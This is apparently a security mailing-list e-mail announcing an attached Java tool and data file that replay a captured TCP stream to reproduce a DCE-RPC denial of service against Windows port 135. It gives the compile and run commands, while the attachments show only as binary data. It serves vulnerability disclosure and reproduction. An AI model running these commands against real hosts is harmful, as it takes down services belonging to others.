Attached to this e-mail is a Java program and a data file which can be used to manually reproduce the DCE-RPC DOS from SPIKE v2.7.
Compile it first with:
$ javac EtherealReplay.java
Then run it with:
$ java EtherealReplay 192.168.x.x 135 < windows_rpc_kill
You may need to wait a few seconds before noticing that port 135 is dead.
As its name suggests, this program replays an Ethereal TCP Stream to a
specified endpoint. So this little tool may come in handy for other things
as well...
- Joe Testa, Rapid 7, Inc.
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839
(See attached file: goodies.tar.gz)(See attached file: goodies.tar.gz.sig)
goodies.tar.gz
Description: Binary data
goodies.tar.gz.sig
Description: Binary data
